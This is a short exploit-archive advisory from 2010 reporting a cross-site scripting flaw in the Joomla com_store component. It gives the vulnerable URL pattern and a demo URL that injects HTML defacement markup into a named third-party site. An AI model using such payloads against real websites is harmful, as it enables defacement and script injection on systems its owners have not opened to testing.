id: 12289
date: 05/19/2010
title: Joomla Component com_store XSS Vulnerability
author: s4r4d0
cves: 

============================================
Joomla Component com_store XSS Vulnerability
============================================


[x] Joomla Component Store
[x] Author: s4r4d0
[x] Contact: s4r4d0@yahoo.com
[x] Team: Fatal Error
[x] Bug: XSS on Component Store
[x] Example: http://www.site.com/index.php?option=com_store=[XSS]
[x] Demo: http://www.kingpincruisers.net/index.php?option=com_store=">><marquee><h1>XSS By Fatal Error</h1><marquee>
[x] Made in Brazil



#  0day.today [2023-03-24]  #